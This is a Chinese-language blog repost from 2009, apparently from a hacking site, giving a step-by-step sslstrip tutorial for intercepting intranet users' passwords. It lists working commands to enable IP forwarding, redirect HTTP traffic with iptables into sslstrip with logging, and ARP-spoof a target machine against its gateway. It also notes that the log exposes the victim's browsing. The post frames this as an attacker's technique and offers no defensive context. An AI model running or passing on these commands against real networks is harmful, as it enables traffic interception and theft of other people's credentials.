Chinaunix首页 | 论坛 | 博客
  • 博客访问: 7461195
  • 博文数量: 1760
  • 博客积分: 18684
  • 博客等级: 上将
  • 技术积分: 16267
  • 用 户 组: 普通用户
  • 注册时间: 2010-06-02 10:28
个人简介

啥也没写

文章分类

全部博文(1760)

文章存档

2024年(6)

2023年(44)

2022年(39)

2021年(46)

2020年(43)

2019年(27)

2018年(44)

2017年(50)

2016年(47)

2015年(15)

2014年(21)

2013年(43)

2012年(143)

2011年(228)

2010年(263)

2009年(384)

2008年(246)

2007年(30)

2006年(38)

2005年(2)

2004年(1)

分类: LINUX

2009-09-12 21:00:03

来源:hackbase.com

    在内网进行中间人攻击可以使得攻击者更有效地截获内网用户的密码及隐秘信息。在BackTrack环境下使用EtterCap or ArpSpoof工具即可. 但Ettercap支持的协议中, 仅对HTTP、FTP、Telnet、SMTP等以明文传输的协议有效. 对HTTPS这样用了OpenSSL的就没办法了..... 直到刚在US举行的black hat 2009会上,一老黑发布的名为sslstrip的software,变像的解决了此问题.

    此软件可在()找到. E文ok的朋友还可以看他在Black hat上的精彩演讲. 因sslstrip是用python写成,不用安装也可运行.用法分为以下几步:

    1) 用命令 echo "1" > /proc/sys/net/ipv4/ip_forward 将你的机子进入forwarding mode.

    2) 用命令 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 使iptables把所有http导入sslstrip.

    3) 运行 sslstrip -a -w ssllog (写入文本)

    4) 运行 arpspoof -i eth0 -t 192.168.1.15 (目标) 192.168.1.1 (网关)

    接下来就耐心等待吧! ;) 要提下的是生成的log文件如ssllog其实是html格式的.用konquer可以打开,这样连目标在看的网页面也一清二楚了. 以上均在自个的LAN和BT3下测试完成.

阅读(936) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~